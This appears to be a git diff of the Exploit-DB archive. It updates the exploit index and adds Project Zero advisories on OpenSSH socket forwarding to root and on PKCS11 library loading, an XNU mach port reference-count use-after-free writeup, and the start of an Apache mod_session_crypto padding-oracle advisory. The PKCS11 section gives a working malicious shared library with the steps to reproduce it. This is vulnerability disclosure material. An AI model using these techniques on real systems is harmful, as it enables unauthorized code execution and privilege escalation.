7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0
7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,php,webapps,0
7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0
7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0
7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,php,webapps,0
7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0
7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' Parameter SQL Injection",2008-11-15,snakespc,php,webapps,0
7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0
@ -21467,7 +21469,7 @@ id,file,description,date,author,platform,type,port
9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0
9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0
9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0
@ -22127,7 +22129,6 @@ id,file,description,date,author,platform,type,port
10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
10834,platforms/php/webapps/10834.txt,"Link Trader - (lnkid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0
10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
10837,platforms/php/webapps/10837.txt,"Quick Poll - 'code.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
@ -25043,7 +25044,7 @@ id,file,description,date,author,platform,type,port
18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0
18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0
18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,php,webapps,0
18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0
18037,platforms/php/webapps/18037.rb,"phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0
18039,platforms/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,php,webapps,0
18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0
18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
@ -26842,7 +26843,7 @@ id,file,description,date,author,platform,type,port
24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
24239,platforms/php/webapps/24239.txt,"CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
24240,platforms/php/webapps/24240.txt,"CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0
24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0
24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 - Null Byte Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0
24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0
24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0
@ -27927,7 +27928,7 @@ id,file,description,date,author,platform,type,port
26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0
26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0
26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0
26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion",2005-07-25,lwdz,php,webapps,0
26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion",2005-07-25,lwdz,php,webapps,0
26025,platforms/php/webapps/26025.txt,"Netquery 3.1 - submit.php portnum Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
26026,platforms/php/webapps/26026.txt,"Netquery 3.1 - nqgeoip2.php Multiple Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
26027,platforms/php/webapps/26027.txt,"Netquery 3.1 - nqgeoip.php step Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
@ -27940,10 +27941,10 @@ id,file,description,date,author,platform,type,port
26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0
26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - 'topic.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - 'forums.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - 'post.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - 'announcesys.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,php,webapps,0
26045,platforms/php/webapps/26045.txt,"phpList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0
26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0
@ -28778,8 +28779,8 @@ id,file,description,date,author,platform,type,port
27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting",2006-01-16,Preddy,php,webapps,0
27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
27100,platforms/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' 'Username' Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
@ -31305,8 +31306,8 @@ id,file,description,date,author,platform,type,port
30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0
30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0
30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0
30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0
30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
@ -31983,9 +31984,9 @@ id,file,description,date,author,platform,type,port
31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - part/menu.php Multiple Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0
31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - cms/includes/header.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - cms/includes/login.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0
31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0
32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0
@ -32724,9 +32725,9 @@ id,file,description,date,author,platform,type,port
33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0
33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0
33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - gmap.php addr Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0
33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Parameter URI redirection",2009-06-27,"599eme Man",php,webapps,0
33125,platforms/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' Parameter SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0
33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0
@ -35638,7 +35639,7 @@ id,file,description,date,author,platform,type,port
37828,platforms/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps,0
37829,platforms/php/webapps/37829.txt,"WordPress Plugin MF Gig Calendar - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0
37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0
37938,platforms/php/webapps/37938.txt,"OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0
37938,platforms/php/webapps/37938.txt,"OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0
37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
38066,platforms/php/webapps/38066.txt,"WordPress Plugin Video Lead Form - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0
38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80
@ -36915,3 +36916,4 @@ id,file,description,date,author,platform,type,port
40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0

Can't render this file because it is too large.

26
platforms/linux/local/40962.txt Executable file
View file

@ -0,0 +1,26 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010
This issue affects OpenSSH if privilege separation is disabled (config option
UsePrivilegeSeparation=no). While privilege separation is enabled by default, it
is documented as a hardening option, and therefore disabling it should not
directly make a system vulnerable.
OpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation
is disabled, then on the server side, the forwarding is handled by a child of
sshd that has root privileges. For TCP server sockets, sshd explicitly checks
whether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if
so, requires the client to authenticate as root. However, for UNIX domain
sockets, no such security measures are implemented.
This means that, using "ssh -L", an attacker who is permitted to log in as a
normal user over SSH can effectively connect to non-abstract unix domain sockets
with root privileges. On systems that run systemd, this can for example be
exploited by asking systemd to add an LD_PRELOAD environment variable for all
following daemon launches and then asking it to restart cron or so. The attached
exploit demonstrates this - if it is executed on a system with systemd where
the user is allowed to ssh to his own account and where privsep is disabled, it
yields a root shell.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip

View file

@ -0,0 +1,33 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009
The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.
This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.
To reproduce the issue, first create a library that executes some command when it is loaded:
$ cat evil_lib.c
#include <stdlib.h>
__attribute__((constructor)) static void run(void) {
// in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,
// prevent recursion through system()
unsetenv("LD_PRELOAD");
unsetenv("LD_LIBRARY_PATH");
system("id > /tmp/test");
}
$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall
Connect to another machine using "ssh -A". Then, on the remote machine:
$ ssh-add -s [...]/evil_lib.so
Enter passphrase for PKCS#11: [just press enter here]
SSH_AGENT_FAILURE
Could not add card: [...]/evil_lib.so
At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent:
$ cat /tmp/test
uid=1000(user) gid=1000(user) groups=[...]
Fixed in http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/ssh-agent.c.diff?r1=1.214&r2=1.215&f=h

View file

@ -1,16 +1,153 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=930
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=926
IOUserClient subclasses which override IOUserClient::externalMethod need to ensure that if they return
kIOReturnSuccess they actually take ownership of the mach_port_t asyncWakePort if they are called via
IOConnectCallAsyncMethod.
mach ports are really struct ipc_port_t's in the kernel; this is a reference-counted object,
ip_reference and ip_release atomically increment and decrement the 32 bit io_references field.
If the userclient code doesn't take ownership of the mach port and returns a success code MIG assumes that
they did take ownership and won't release it's reference on the port. This leads to a reference count leak.
Unlike OSObjects, ip_reference will allow the reference count to overflow, however it is still 32-bits
so without either a lot of physical memory (which you don't have on mobile or most desktops) or a real reference leak
this isn't that interesting.
See the previous bug for more in-depth discussion.
** MIG and mach message rights ownership **
This PoC targets IOSurface which was just the first userclient I looked at; I imagine more are vulnerable.
This PoC takes about an hour on 4 core MacBookPro to trigger the kernel UaF.
ipc_kobject_server in ipc_kobject.c is the main dispatch routine for the kernel MIG endpoints. When userspace sends a
message the kernel will copy in the message body and also copy in all the message rights; see for example
ipc_right_copyin in ipc_right.c. This means that by the time we reach the actual callout to the MIG handler any port rights
contained in a request have had their reference count increased by one.
After the callout we reach the following code (still in ipc_kobject_server):
if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
// The server function is responsible for the contents
// of the message. The reply port right is moved
// to the reply message, and we have deallocated
// the destination port right, so we just need
// to free the kmsg.
ipc_kmsg_free(request);
} else {
// The message contents of the request are intact.
// Destroy everthing except the reply port right,
// which is needed in the reply message.
request->ikm_header->msgh_local_port = MACH_PORT_NULL;
ipc_kmsg_destroy(request);
}
If the MIG callout returns success, then it means that the method took ownership of *all* of the rights contained in the message.
If the MIG callout returns a failure code then the means the method took ownership of *none* of the rights contained in the message.
ipc_kmsg_free will only destroy the message header, so if the message had any other port rights then their reference counts won't be
decremented. ipc_kmsg_destroy on the other hand will decrement the reference counts for all the port rights in the message, even those
in port descriptors.
If we can find a MIG method which returns KERN_SUCCESS but doesn't in fact take ownership of any mach ports its passed (by for example
storing them and dropping the ref later, or using them then immediately dropping the ref or passing them to another method which takes
ownership) then this can lead to us being able to leak references.
** indirect MIG methods **
Here's the MIG request structure generated for io_service_add_notification_ool_64:
typedef struct {
mach_msg_header_t Head;
// start of the kernel processed data
mach_msg_body_t msgh_body;
mach_msg_ool_descriptor_t matching;
mach_msg_port_descriptor_t wake_port;
// end of the kernel processed data
NDR_record_t NDR;
mach_msg_type_number_t notification_typeOffset; // MiG doesn't use it
mach_msg_type_number_t notification_typeCnt;
char notification_type[128];
mach_msg_type_number_t matchingCnt;
mach_msg_type_number_t referenceCnt;
io_user_reference_t reference[8];
mach_msg_trailer_t trailer;
} Request __attribute__((unused));
This is an interesting method as its implementation actually calls another MIG handler:
static kern_return_t internal_io_service_add_notification_ool(
...
kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t) matching );
data = CAST_DOWN(vm_offset_t, map_data);
if( KERN_SUCCESS == kr) {
// must return success after vm_map_copyout() succeeds
// and mig will copy out objects on success
*notification = 0;
*result = internal_io_service_add_notification( master_port, notification_type,
(char *) data, matchingCnt, wake_port, reference, referenceSize, client64, notification );
vm_deallocate( kernel_map, data, matchingCnt );
}
return( kr );
}
and internal_io_service_add_notification does this:
static kern_return_t internal_io_service_add_notification(
...
if( master_port != master_device_port)
return( kIOReturnNotPrivileged);
do {
err = kIOReturnNoResources;
if( !(sym = OSSymbol::withCString( notification_type )))
err = kIOReturnNoResources;
if (matching_size)
{
dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching, matching_size));
}
else
{
dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching));
}
if (!dict) {
err = kIOReturnBadArgument;
continue;
}
...
} while( false );
return( err );
This inner function has many failure cases (wrong kernel port, invalid serialized data) which we can easily trigger and these error paths lead
to this inner function not taking ownership of the wake_port argument. However, MIG will only see the return value of the outer internal_io_service_add_notification_ool
which will always return success if we pass a valid ool memory descriptor. This violates ipc_kobject_server's ownership model where success means ownership
was taken of all rights, not just some.
What this leads to is actually quite a nice primitive for constructing an ipc_port_t reference count overflow without leaking any memory.
If we call io_service_add_notification_ool with a valid ool descriptor, but fill it with data that causes OSUnserializeXML to return an error then
we can get that memory freed (via the vm_deallocate call above) but the reference on the wake port will be leaked since ipc_kmsg_free will be called, not
ipc_kmsg_destroy.
If we send this request 0xffffffff times we can cause a ipc_port_t's io_references field to overflow to 0; the next time it's used the ref will go 0 -> 1 -> 0
and the object will be free'd but we'll still have a dangling pointer in our process's ports table.
As well as being a regular kernel UaF this also gives us the opportunity to do all kinds of fun mach port related logic attacks, eg getting send rights to
other task's task ports via our dangling ipc_port_t pointer.
** practicality **
On my 4 year old dual core MBA 5,2 running with two threads this PoC takes around 8 hours after which you should see a kernel panic indicative of a UaF.
Note that there are no resources leaks involved here so you can run it even on very constrained systems like an iPhone and it will work fine,
albeit a bit slowly :)
This code is reachable from all sandboxed environments.
** fixes **
One approach to fixing this issue would be to do something similar to OSObjects which use a saturating reference count and leak the object if the reference count saturates
I fear there are a great number of similar issues so just fixing this once instance may not be enough.
Proof of Concept:

View file

@ -0,0 +1,376 @@
'''
Advisory: Padding Oracle in Apache mod_session_crypto
During a penetration test, RedTeam Pentesting discovered a Padding
Oracle vulnerability in mod_session_crypto of the Apache web server.
This vulnerability can be exploited to decrypt the session data and even
encrypt attacker-specified data.
Details
=======
Product: Apache HTTP Server mod_session_crypto
Affected Versions: 2.3 to 2.5
Fixed Versions: 2.4.25
Vulnerability Type: Padding Oracle
Security Risk: high
Vendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt
Advisory Status: published
CVE: CVE-2016-0736
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736
Introduction
============
The module mod_session_crypto of the Apache HTTP Server can be used in
conjunction with the modules mod_session and mod_session_cookie to store
session data in an encrypted cookie within the users' browsers. This
avoids server-side session state so that incoming HTTP requests can be
easily distributed amongst a number of application web servers which do
not need to share session state.
More Details
============
The module mod_session_crypto uses symmetric cryptography to encrypt and
decrypt session data and uses mod_session to store the encrypted data in
a cookie (usually called "session") within the user's browser. The
decrypted session is then made available to the application in an
environment variable (in case of a CGI script) or in a custom HTTP
request header. The application can add a custom HTTP response header
(usually "X-Replace-Session") which instructs the HTTP server to replace
the session's content with the value of the header. Detailed
instructions to set up mod_session and mod_session_crypto can be found
in the documentation:
https://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples
The module mod_session_crypto is configured to use either 3DES or AES
with various key sizes, defaulting to AES256. Encryption is handled by
the function "encrypt_string":
modules/session/mod_session_crypto.c
------------------------------------------------------------------------
/**
* Encrypt the string given as per the current config.
*
* Returns APR_SUCCESS if successful.
*/
static apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,
session_crypto_dir_conf *dconf, const char *in, char **out)
{
[...]
apr_crypto_key_t *key = NULL;
[...]
const unsigned char *iv = NULL;
[...]
/* use a uuid as a salt value, and prepend it to our result */
apr_uuid_get(&salt);
[...]
res = apr_crypto_passphrase(&key, &ivSize, passphrase,
strlen(passphrase),
(unsigned char *) (&salt), sizeof(apr_uuid_t),
*cipher, APR_MODE_CBC, 1, 4096, f, r->pool);
[...]
res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);
[...]
res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,
strlen(in), block);
[...]
res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);
[...]
/* prepend the salt and the iv to the result */
combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));
memcpy(combined, &salt, sizeof(apr_uuid_t));
memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);
memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);
/* base64 encode the result */
base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +
sizeof(apr_uuid_t) + 1)
* sizeof(char));
[...]
return res;
}
------------------------------------------------------------------------
The source code shows that an encryption key is derived from the
configured password and a randomly chosen salt by calling the function
"apr_crypto_passphrase". This function internally uses PBKDF2 to derive
the key. The data is then encrypted and the salt and IV prepended to the
